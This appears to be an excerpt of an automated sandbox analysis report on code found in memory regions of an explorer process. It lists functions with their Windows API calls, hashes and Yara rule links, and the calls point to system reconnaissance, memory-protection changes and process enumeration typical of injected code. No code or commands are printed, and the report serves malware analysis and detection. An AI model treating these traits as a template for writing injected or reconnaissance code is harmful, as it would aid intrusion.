                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Exception$Throw$FileHeaderRaise
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3102897148-0
                                                                                                                                                                                                                                                    • Opcode ID: 1353ec0ddd316c97f19d171a385adc41b6789989211409ce1987633c4a31244e
                                                                                                                                                                                                                                                    • Instruction ID: 1f0978eccc12e1fa9e86c4ac0b6b0c07c1ee87907414cc98c259631f27cfa53e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1353ec0ddd316c97f19d171a385adc41b6789989211409ce1987633c4a31244e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E0112AA600A448ED71CEF72E85207B1363F7D4784B14D83ABA5D4F648DF74D5128750
                                                                                                                                                                                                                                                    Function 0F4CD8B0 Relevance: 6.3, APIs: 5, Instructions: 80COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4CD8DE
                                                                                                                                                                                                                                                      • Part of subcall function 0F4BC34C: RtlPcToFileHeader.NTDLL ref: 0F4BC3DB
                                                                                                                                                                                                                                                      • Part of subcall function 0F4BC34C: RaiseException.KERNEL32 ref: 0F4BC41A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4CD901
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4CD921
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4CD94A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0F4CD96A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Exception$Throw$FileHeaderRaise
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3102897148-0
                                                                                                                                                                                                                                                    • Opcode ID: 1353ec0ddd316c97f19d171a385adc41b6789989211409ce1987633c4a31244e
                                                                                                                                                                                                                                                    • Instruction ID: 8e48cc20f10856164c4b938357cb8c55d88d5176fcfb2196528e53e70899f743
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1353ec0ddd316c97f19d171a385adc41b6789989211409ce1987633c4a31244e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5901036660074489D71CEBB7A8914AA2353EBD4780B08D43F6E994B60ADF68C5528750
                                                                                                                                                                                                                                                    Function 0C37CCB0 Relevance: 6.3, APIs: 5, Instructions: 80COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3082051736.000000000C350000.00000020.00000400.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionThrow
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 432778473-0
                                                                                                                                                                                                                                                    • Opcode ID: 5ede42d4885f0e928c195373aafba5a0f1a953601a973012476eb3c76365236e
                                                                                                                                                                                                                                                    • Instruction ID: 9c7ca236813ed8b21daad7d6eddb90016a2234dfc4a76addb2c7d6d48eedf0d9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ede42d4885f0e928c195373aafba5a0f1a953601a973012476eb3c76365236e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B90152626206448AD71CFE72A8510AB6362FBD4784F04D836AA9A4BE0CCF74C4198B40
                                                                                                                                                                                                                                                    Function 0E91D8B0 Relevance: 6.3, APIs: 5, Instructions: 80COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E91D8DE
                                                                                                                                                                                                                                                      • Part of subcall function 0E90C34C: RtlPcToFileHeader.NTDLL ref: 0E90C3DB
                                                                                                                                                                                                                                                      • Part of subcall function 0E90C34C: RaiseException.KERNEL32 ref: 0E90C41A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E91D901
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E91D921
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E91D94A
                                                                                                                                                                                                                                                    • _CxxThrowException.LIBCMT ref: 0E91D96A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Exception$Throw$FileHeaderRaise
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3102897148-0
                                                                                                                                                                                                                                                    • Opcode ID: 1353ec0ddd316c97f19d171a385adc41b6789989211409ce1987633c4a31244e
                                                                                                                                                                                                                                                    • Instruction ID: 7d42606d444aa4edea3a1d1393e7809925001c11d4c9d2abd4a4be28d4d4e5b7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1353ec0ddd316c97f19d171a385adc41b6789989211409ce1987633c4a31244e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B0182A2611640DEDB0CFF72A85106B53A3FBD4780B04DD36AE494B658CF74D8128B40
                                                                                                                                                                                                                                                    Function 0A04CCB0 Relevance: 6.3, APIs: 5, Instructions: 80COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3079258886.000000000A020000.00000020.00000001.00020000.00000000.sdmp, Offset: 0A020000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_a020000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionThrow
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 432778473-0
                                                                                                                                                                                                                                                    • Opcode ID: 5ede42d4885f0e928c195373aafba5a0f1a953601a973012476eb3c76365236e
                                                                                                                                                                                                                                                    • Instruction ID: 199a07136130b6e0d44bf90b6943a936959e52a1719279612c23f25ffab7d183
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ede42d4885f0e928c195373aafba5a0f1a953601a973012476eb3c76365236e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46011EA7700B489AD71CFE73A8510FB236AE7D9784F04D836EA5A4BA09DF74C4118740
                                                                                                                                                                                                                                                    Function 0E8CCCB0 Relevance: 6.3, APIs: 5, Instructions: 80COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084893712.000000000E8A0000.00000020.00000400.00020000.00000000.sdmp, Offset: 0E8A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionThrow
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 432778473-0
                                                                                                                                                                                                                                                    • Opcode ID: 5ede42d4885f0e928c195373aafba5a0f1a953601a973012476eb3c76365236e
                                                                                                                                                                                                                                                    • Instruction ID: 2b1513e59686aa07c319d119bd694c4f7ac8e52402bbc320332ada91b3968099
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ede42d4885f0e928c195373aafba5a0f1a953601a973012476eb3c76365236e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C20125A67017448BD71CFEB7A8550AB13A2FBD4790F08DC36AA5A8FB18DF74C8118740
                                                                                                                                                                                                                                                    Function 10D74CF0 Relevance: 6.3, APIs: 5, Instructions: 46stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 10D74B50: GetUserNameW.ADVAPI32 ref: 10D74C09
                                                                                                                                                                                                                                                      • Part of subcall function 10D74B50: GetComputerNameW.KERNEL32 ref: 10D74C23
                                                                                                                                                                                                                                                      • Part of subcall function 10D74B50: GetNativeSystemInfo.KERNEL32 ref: 10D74C4C
                                                                                                                                                                                                                                                      • Part of subcall function 10D74B50: GetVersionExA.KERNEL32 ref: 10D74C5D
                                                                                                                                                                                                                                                      • Part of subcall function 10D74B50: wsprintfA.USER32 ref: 10D74CA3
                                                                                                                                                                                                                                                      • Part of subcall function 10D74B50: free.MSVCRT ref: 10D74CB7
                                                                                                                                                                                                                                                      • Part of subcall function 10D746D0: lstrcpyA.KERNEL32 ref: 10D7472F
                                                                                                                                                                                                                                                      • Part of subcall function 10D746D0: lstrcmp.KERNEL32 ref: 10D74756
                                                                                                                                                                                                                                                      • Part of subcall function 10D746D0: free.MSVCRT ref: 10D747CA
                                                                                                                                                                                                                                                      • Part of subcall function 10D746D0: Sleep.KERNEL32 ref: 10D747D5
                                                                                                                                                                                                                                                    • StrStrIA.SHLWAPI ref: 10D74D15
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32 ref: 10D74D38
                                                                                                                                                                                                                                                    • StrStrIA.SHLWAPI ref: 10D74D4A
                                                                                                                                                                                                                                                    • malloc.MSVCRT ref: 10D74D5D
                                                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 10D74D72
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Namefree$ComputerInfoNativeSleepSystemUserVersionlstrcmplstrcpylstrlenmallocmemcpywsprintf
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 202095213-0
                                                                                                                                                                                                                                                    • Opcode ID: 9e079d81c060a453b2ace70219551695a1de138133d71ec4bf92d3b26920733f
                                                                                                                                                                                                                                                    • Instruction ID: 27099a128e7b69544c216ec4e202312bc16dd05f1013e5ee7b2e44e537a43469
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e079d81c060a453b2ace70219551695a1de138133d71ec4bf92d3b26920733f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C301A22671578082DA599BA6B95435EA6A0EB4CFC8F0C9470EE9E43F5CEF7CD4918700
                                                                                                                                                                                                                                                    Function 0F4B4CF0 Relevance: 6.3, APIs: 5, Instructions: 46stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0F4B4B50: GetUserNameW.ADVAPI32 ref: 0F4B4C09
                                                                                                                                                                                                                                                      • Part of subcall function 0F4B4B50: GetComputerNameW.KERNEL32 ref: 0F4B4C23
                                                                                                                                                                                                                                                      • Part of subcall function 0F4B4B50: GetNativeSystemInfo.KERNEL32 ref: 0F4B4C4C
                                                                                                                                                                                                                                                      • Part of subcall function 0F4B4B50: GetVersionExA.KERNEL32 ref: 0F4B4C5D
                                                                                                                                                                                                                                                      • Part of subcall function 0F4B4B50: wsprintfA.USER32 ref: 0F4B4CA3
                                                                                                                                                                                                                                                      • Part of subcall function 0F4B4B50: free.MSVCRT ref: 0F4B4CB7
                                                                                                                                                                                                                                                      • Part of subcall function 0F4B46D0: lstrcpyA.KERNEL32 ref: 0F4B472F
                                                                                                                                                                                                                                                      • Part of subcall function 0F4B46D0: lstrcmp.KERNEL32 ref: 0F4B4756
                                                                                                                                                                                                                                                      • Part of subcall function 0F4B46D0: free.MSVCRT ref: 0F4B47CA
                                                                                                                                                                                                                                                      • Part of subcall function 0F4B46D0: Sleep.KERNEL32 ref: 0F4B47D5
                                                                                                                                                                                                                                                    • StrStrIA.SHLWAPI ref: 0F4B4D15
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32 ref: 0F4B4D38
                                                                                                                                                                                                                                                    • StrStrIA.SHLWAPI ref: 0F4B4D4A
                                                                                                                                                                                                                                                    • malloc.MSVCRT ref: 0F4B4D5D
                                                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0F4B4D72
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Namefree$ComputerInfoNativeSleepSystemUserVersionlstrcmplstrcpylstrlenmallocmemcpywsprintf
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 202095213-0
                                                                                                                                                                                                                                                    • Opcode ID: 9e079d81c060a453b2ace70219551695a1de138133d71ec4bf92d3b26920733f
                                                                                                                                                                                                                                                    • Instruction ID: 5f413a7d57d2c20e0f8b660c511e80f25e24e043801644a052bd9cbc26f034c4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e079d81c060a453b2ace70219551695a1de138133d71ec4bf92d3b26920733f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9601D42571578182DE649B27B9543AAA2A0EB4CFD0F4C4039DE5F43F1AEE2CD4558700
                                                                                                                                                                                                                                                    Function 0E904CF0 Relevance: 6.3, APIs: 5, Instructions: 46stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0E904B50: GetUserNameW.ADVAPI32 ref: 0E904C09
                                                                                                                                                                                                                                                      • Part of subcall function 0E904B50: GetComputerNameW.KERNEL32 ref: 0E904C23
                                                                                                                                                                                                                                                      • Part of subcall function 0E904B50: GetNativeSystemInfo.KERNEL32 ref: 0E904C4C
                                                                                                                                                                                                                                                      • Part of subcall function 0E904B50: GetVersionExA.KERNEL32 ref: 0E904C5D
                                                                                                                                                                                                                                                      • Part of subcall function 0E904B50: wsprintfA.USER32 ref: 0E904CA3
                                                                                                                                                                                                                                                      • Part of subcall function 0E904B50: free.MSVCRT ref: 0E904CB7
                                                                                                                                                                                                                                                      • Part of subcall function 0E9046D0: lstrcpyA.KERNEL32 ref: 0E90472F
                                                                                                                                                                                                                                                      • Part of subcall function 0E9046D0: lstrcmp.KERNEL32 ref: 0E904756
                                                                                                                                                                                                                                                      • Part of subcall function 0E9046D0: free.MSVCRT ref: 0E9047CA
                                                                                                                                                                                                                                                      • Part of subcall function 0E9046D0: Sleep.KERNEL32 ref: 0E9047D5
                                                                                                                                                                                                                                                    • StrStrIA.SHLWAPI ref: 0E904D15
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32 ref: 0E904D38
                                                                                                                                                                                                                                                    • StrStrIA.SHLWAPI ref: 0E904D4A
                                                                                                                                                                                                                                                    • malloc.MSVCRT ref: 0E904D5D
                                                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0E904D72
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Namefree$ComputerInfoNativeSleepSystemUserVersionlstrcmplstrcpylstrlenmallocmemcpywsprintf
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 202095213-0
                                                                                                                                                                                                                                                    • Opcode ID: 5c86dece8914385246a17c573445a92c2157d5b7fd720960fbf9c981bcdad2cc
                                                                                                                                                                                                                                                    • Instruction ID: d512aedecbb54ed5af6dfd385bfcae301ac8f8a070fa0b749336909fb17e9eed
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c86dece8914385246a17c573445a92c2157d5b7fd720960fbf9c981bcdad2cc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF01A72671578086DE549B26F95431D92A5EB8CFC0F485934DF5E53F5CEE2CD8518B00
                                                                                                                                                                                                                                                    Function 10D67B90 Relevance: 6.1, APIs: 4, Instructions: 73memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ProtectVirtual$CacheCurrentFlushInstructionProcess
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4115577372-0
                                                                                                                                                                                                                                                    • Opcode ID: d66ccdd5a9c5d6d01f7014d4261891ccb6e82d083e509715e276d6d03d9aa130
                                                                                                                                                                                                                                                    • Instruction ID: 285839728028b5b7f0419ee204f3e5a937ace7b82f638ad631f3919d087ecf7c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d66ccdd5a9c5d6d01f7014d4261891ccb6e82d083e509715e276d6d03d9aa130
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD31DD72218B8487D7108F75E9043697B60F709F88F0A8256EFD84778AEB2CC451C754
                                                                                                                                                                                                                                                    Function 0F4A7B90 Relevance: 6.1, APIs: 4, Instructions: 73memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ProtectVirtual$CacheCurrentFlushInstructionProcess
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4115577372-0
                                                                                                                                                                                                                                                    • Opcode ID: d66ccdd5a9c5d6d01f7014d4261891ccb6e82d083e509715e276d6d03d9aa130
                                                                                                                                                                                                                                                    • Instruction ID: fc6aee538f5594e5f2763c6b59f9fbbbb354ccbb533e626f2052a182213aac0e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d66ccdd5a9c5d6d01f7014d4261891ccb6e82d083e509715e276d6d03d9aa130
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E631F2A3218BC18AD7308F35E5003AA7B71F719F88F484216DF944B78ACB2DD456C794
                                                                                                                                                                                                                                                    Function 10D63030 Relevance: 6.1, APIs: 4, Instructions: 51processCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process32$Next$CreateFirstSnapshotToolhelp32
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1264244614-0
                                                                                                                                                                                                                                                    • Opcode ID: f5d1032e709edc81f2c7e8fc513d8a913059acf3289e19d00c6aa407b4951a31
                                                                                                                                                                                                                                                    • Instruction ID: acd5b336e3407c90d2aadcb9848d80cd200390b7c9deb7f374b92bcf411982ed
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f5d1032e709edc81f2c7e8fc513d8a913059acf3289e19d00c6aa407b4951a31
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E11D02631868093CA10CF24E5513AAB371F7C87D8F848221EAAD43AC8EF2CD609CB10
                                                                                                                                                                                                                                                    Function 0F4A3030 Relevance: 6.1, APIs: 4, Instructions: 51processCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process32$Next$CreateFirstSnapshotToolhelp32
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1264244614-0
                                                                                                                                                                                                                                                    • Opcode ID: f5d1032e709edc81f2c7e8fc513d8a913059acf3289e19d00c6aa407b4951a31
                                                                                                                                                                                                                                                    • Instruction ID: 9b13b188ebdda953a12591fe222cde7e9892b6f43811ee182909b86d7eb83716
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f5d1032e709edc81f2c7e8fc513d8a913059acf3289e19d00c6aa407b4951a31
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E211542231878091DA20DB16E4503EBB375F799794F84422ADFAD47B9AEF2DD605CB10
                                                                                                                                                                                                                                                    Function 0E8F3030 Relevance: 6.1, APIs: 4, Instructions: 51processCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process32$Next$CreateFirstSnapshotToolhelp32
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1264244614-0
                                                                                                                                                                                                                                                    • Opcode ID: f5d1032e709edc81f2c7e8fc513d8a913059acf3289e19d00c6aa407b4951a31
                                                                                                                                                                                                                                                    • Instruction ID: d577190a93241a082343ad957a96adf518c1d422884241b81ae555d7cdaed5c9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f5d1032e709edc81f2c7e8fc513d8a913059acf3289e19d00c6aa407b4951a31
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0211663231468496CE20EB15E4603AAA3B5FBC97D4FC44621DB9D876D8DF6CCA05CB41
                                                                                                                                                                                                                                                    Function 10D68420 Relevance: 6.0, APIs: 4, Instructions: 34threadmemoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Offset: 10D60000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_10d60000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Thread$CloseFreeHandleHeapOpenResume
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 993137029-0
                                                                                                                                                                                                                                                    • Opcode ID: 0357dbdb6385a96431d67da00d9a99dd25169e76329cf284d5fbd5679ae9b1d7
                                                                                                                                                                                                                                                    • Instruction ID: daaf2d09fe5a369b2303b342abdad09c7cb7fb64bc455293fd8477d769a9dd94
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0357dbdb6385a96431d67da00d9a99dd25169e76329cf284d5fbd5679ae9b1d7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7016D76612B41C7DB449FA6F4843597361F788FC4F188165DB8A03714CF78D4A2CB00
                                                                                                                                                                                                                                                    Function 0F4A8420 Relevance: 6.0, APIs: 4, Instructions: 34threadmemoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F4A0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_f4a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Thread$CloseFreeHandleHeapOpenResume
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 993137029-0
                                                                                                                                                                                                                                                    • Opcode ID: 0357dbdb6385a96431d67da00d9a99dd25169e76329cf284d5fbd5679ae9b1d7
                                                                                                                                                                                                                                                    • Instruction ID: 6fd442add8fe4e2bf4ee5c8050430f7fd6863a8e991f10462ccb3c2daee3717c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0357dbdb6385a96431d67da00d9a99dd25169e76329cf284d5fbd5679ae9b1d7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 97016D36616A4586DB548B66E48032A7361F788F94F489036DE1A03B15DF39D0A6CB40
                                                                                                                                                                                                                                                    Function 0C36AC9C Relevance: 6.0, APIs: 4, Instructions: 30COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3082051736.000000000C350000.00000020.00000400.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: abort$_set_abort_behavior
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2064194629-0
                                                                                                                                                                                                                                                    • Opcode ID: f97450b9b86fa87584f9f252aa240a0136eb92af641d05f4d6b54aa23e90d3bd
                                                                                                                                                                                                                                                    • Instruction ID: 29f8ac576b68f64378aeb32675b86d5d792178c16310c63ce5d62b8ccefe7f14
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f97450b9b86fa87584f9f252aa240a0136eb92af641d05f4d6b54aa23e90d3bd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 97F02728332B0485FE18BB60F8547082360FB84B85F60DE14C60E47B14DF7CE25DAB22
